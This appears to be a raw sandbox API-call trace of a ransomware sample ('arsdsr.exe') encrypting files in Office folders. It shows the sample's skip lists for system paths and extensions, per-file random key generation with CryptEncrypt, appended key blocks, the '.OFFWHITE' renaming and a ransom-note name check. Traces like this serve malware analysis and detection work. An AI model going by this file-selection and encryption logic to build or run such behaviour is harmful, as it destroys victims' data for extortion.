[0145.442] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.442] SetLastError (dwErrCode=0x0) [0145.442] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.446] GetLastError () returned 0x0 [0145.446] GetLastError () returned 0x0 [0145.446] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.446] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.446] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.446] WriteFile (in: hFile=0x218, lpBuffer=0x52ebb0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ebb0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.446] GetProcessHeap () returned 0x500000 [0145.446] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3d60) returned 0x5607c8 [0145.447] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3d60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3d60, lpOverlapped=0x0) returned 1 [0145.449] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.449] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3d60, lpOverlapped=0x0) returned 1 [0145.450] GetProcessHeap () returned 0x500000 [0145.450] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.450] CloseHandle (hObject=0x218) returned 1 [0145.450] GetProcessHeap () returned 0x500000 [0145.450] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.450] GetProcessHeap () returned 0x500000 [0145.450] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.450] GetProcessHeap () returned 0x500000 [0145.450] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.450] GetProcessHeap () returned 0x500000 [0145.450] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.450] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" [0145.450] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.OFFWHITE" [0145.450] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.offwhite")) returned 1 [0145.451] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe092000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe092000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 0 [0145.451] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0145.451] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0xdfea7b52, cFileName="3082", cAlternateFileName="")) returned 1 [0145.451] lstrcmpiW (lpString1="3082", lpString2=".") returned 1 [0145.451] lstrcmpiW (lpString1="3082", lpString2="..") returned 1 [0145.451] lstrcmpiW (lpString1="3082", lpString2="...") returned 1 [0145.451] lstrcmpiW (lpString1="3082", lpString2="windows") returned -1 [0145.452] lstrcmpiW (lpString1="3082", lpString2="$recycle.bin") returned 1 [0145.452] lstrcmpiW (lpString1="3082", lpString2="rsa") returned -1 [0145.452] lstrcmpiW (lpString1="3082", lpString2="ntuser.dat") returned -1 [0145.452] lstrcmpiW (lpString1="3082", lpString2="programdata") returned -1 [0145.452] lstrcmpiW (lpString1="3082", lpString2="appdata") returned -1 [0145.452] lstrcmpiW (lpString1="3082", lpString2="program files") returned -1 [0145.452] lstrcmpiW (lpString1="3082", lpString2="program files (x86)") returned -1 [0145.452] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\" [0145.452] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\", lpString2="3082" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082" [0145.452] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.452] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.452] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*.*") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*.*" [0145.452] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0145.454] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0145.454] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0145.456] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0145.456] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0145.456] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".") returned 1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="..") returned 1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="...") returned 1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="windows") returned -1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="rsa") returned -1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="programdata") returned -1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="appdata") returned 1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="program files") returned -1 [0145.456] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.456] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.457] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="ENVELOPR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" [0145.457] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.457] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.457] PathFindExtensionW (pszPath="ENVELOPR.DLL.trx_dll") returned=".trx_dll" [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.457] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.457] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0145.457] GetProcessHeap () returned 0x500000 [0145.457] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ebc0 [0145.457] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.458] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=14176) returned 1 [0145.459] GetProcessHeap () returned 0x500000 [0145.459] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.459] GetProcessHeap () returned 0x500000 [0145.459] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.459] GetProcessHeap () returned 0x500000 [0145.459] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.459] GetProcessHeap () returned 0x500000 [0145.459] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.459] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.459] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.459] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.459] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.459] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.459] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.459] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.459] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.459] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.459] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.460] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.460] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.460] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.460] SetLastError (dwErrCode=0x0) [0145.460] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.462] GetLastError () returned 0x0 [0145.462] GetLastError () returned 0x0 [0145.462] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3860, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.462] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.462] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.462] WriteFile (in: hFile=0x218, lpBuffer=0x52ebc0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ebc0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.462] GetProcessHeap () returned 0x500000 [0145.462] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3760) returned 0x5607c8 [0145.463] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.463] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3760, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3760, lpOverlapped=0x0) returned 1 [0145.465] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.465] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3760, lpOverlapped=0x0) returned 1 [0145.466] GetProcessHeap () returned 0x500000 [0145.466] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.466] CloseHandle (hObject=0x218) returned 1 [0145.466] GetProcessHeap () returned 0x500000 [0145.466] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.466] GetProcessHeap () returned 0x500000 [0145.466] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.466] GetProcessHeap () returned 0x500000 [0145.466] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.466] GetProcessHeap () returned 0x500000 [0145.466] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.466] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" [0145.466] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.OFFWHITE" [0145.466] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.offwhite")) returned 1 [0145.467] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xb960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".") returned 1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="..") returned 1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="...") returned 1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="windows") returned -1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="rsa") returned -1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="programdata") returned -1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="appdata") returned 1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="program files") returned -1 [0145.467] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.467] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.467] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="GRINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" [0145.467] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.468] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.468] PathFindExtensionW (pszPath="GRINTL32.DLL.trx_dll") returned=".trx_dll" [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.468] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0145.468] GetProcessHeap () returned 0x500000 [0145.468] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ebd0 [0145.468] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.469] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=47456) returned 1 [0145.469] GetProcessHeap () returned 0x500000 [0145.469] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.469] GetProcessHeap () returned 0x500000 [0145.469] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.469] GetProcessHeap () returned 0x500000 [0145.469] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.469] GetProcessHeap () returned 0x500000 [0145.469] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.469] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.469] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.469] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.469] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.469] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.469] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.469] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.469] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.469] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.470] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.470] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.470] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.470] SetLastError (dwErrCode=0x0) [0145.470] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.473] GetLastError () returned 0x0 [0145.473] 